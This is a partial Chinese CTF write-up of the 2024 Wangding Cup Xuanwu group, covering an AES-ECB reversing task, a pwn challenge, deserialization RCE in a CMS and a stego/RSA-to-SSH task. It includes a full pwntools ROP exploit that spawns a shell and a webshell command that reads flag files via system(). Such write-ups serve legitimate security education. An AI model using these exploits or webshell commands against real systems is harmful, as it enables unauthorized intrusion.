CTF | 2024网鼎杯玄武组WP(部分)

admin 2024年11月10日21:13:22评论8 views字数 1568阅读5分13秒阅读模式

CTF | 2024网鼎杯玄武组WP(部分)

RE02

CTF | 2024网鼎杯玄武组WP(部分)

使用jadx,黄色部分为密文,使用aes 加密

CTF | 2024网鼎杯玄武组WP(部分)

解密秘钥,ecb 模式

CTF | 2024网鼎杯玄武组WP(部分)

PWN02

使 用 脚 本 替 换 环 境 ip 端 口 , 执 行 命 令 获 取 权 限 , 查 找 flag, 获 得 flag

from pwn import *remote_conn = remote("0192f6332a7678de9fe15237d593bac9.4rgk.dg07.ciihw.cn","45824")context.log_level = 'debug' remote_conn.recvuntil(b": ")canary_value = int(remote_conn.recvline(), 16)remote_conn.recvline()remote_conn.send(b"a" * 0x28 + p32(1) + b"a" * 0x10)remote_conn.recvline()remote_conn.send(b"0")remote_conn.recvline()remote_conn.send(b"b" * 0x70)remote_conn.recvline()rop_pop_rdi = 0x40213frop_pop_rsi = 0x40a1aerop_pop_rdx_rbx = 0x485febrop_pop_rax = 0x450277rop_syscall = 0x41AC26payload = b"" payload += b"a" * 0x64 + p32(0x11111111) + b"a" * 0x90 + p64(canary_value) + b"a" * 0x8 + p64(canary_value) + b"a" * 0x8payload += p64(rop_pop_rdi) + p64(0) + p64(rop_pop_rsi) + p64(0x4c5000) +p64(rop_pop_rdx_rbx) + p64(0x8) + p64(0) + p64(rop_pop_rax) + p64(0) + p64(rop_syscall)payload += p64(rop_pop_rdi) + p64(0x4c5000) + p64(rop_pop_rsi) + p64(0) +p64(rop_pop_rdx_rbx) + p64(0) + p64(0) + p64(rop_pop_rax) + p64(0x3b) + p64(rop_syscall)remote_conn.send(payload)sleep(0.5)remote_conn.send(b"/bin/shx00")remote_conn.interactive(

 CTF | 2024网鼎杯玄武组WP(部分)

CTF | 2024网鼎杯玄武组WP(部分)

web01

弱口令: admin/admin登陆成功

访问 /login.php?m=admin &c=Field&a=arctype_index&lang=cn 接口

添加字段,抓包修改:

CTF | 2024网鼎杯玄武组WP(部分)

编辑再提交抓包修改

CTF | 2024网鼎杯玄武组WP(部分)

访问 /login.php?m=admin &c=Field&a=channel_edit&channel_id=-99&id=592&_ajax=1 接口触发反序列化 rce

CTF | 2024网鼎杯玄武组WP(部分)

Rce 读取 flag:

/a.php617ac73525b3 33bea4ac35a717dd8b0a.php?_=system("cat ../../../../../../../../../flag.txt"); 

CTF | 2024网鼎杯玄武组WP(部分)

web03

利用dirsearch扫描目录

CTF | 2024网鼎杯玄武组WP(部分)

robots内容

CTF | 2024网鼎杯玄武组WP(部分)

访问wbStego4.bmp,利用wbStego4工具解出公钥文件

CTF | 2024网鼎杯玄武组WP(部分)

获得公钥文件

CTF | 2024网鼎杯玄武组WP(部分)

利用rsatool导入公钥解出私钥,要在文件前面添加ssh-rsa并且保留AAAA之后的数据 删除前面的

CTF | 2024网鼎杯玄武组WP(部分)

CTF | 2024网鼎杯玄武组WP(部分)

保存用ssh登录输入用户root456即可得到flag

原文始发于微信公众号(励行安全):CTF | 2024网鼎杯玄武组WP(部分)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年11月10日21:13:22
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CTF | 2024网鼎杯玄武组WP(部分)https://cn-sec.com/archives/3379949.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息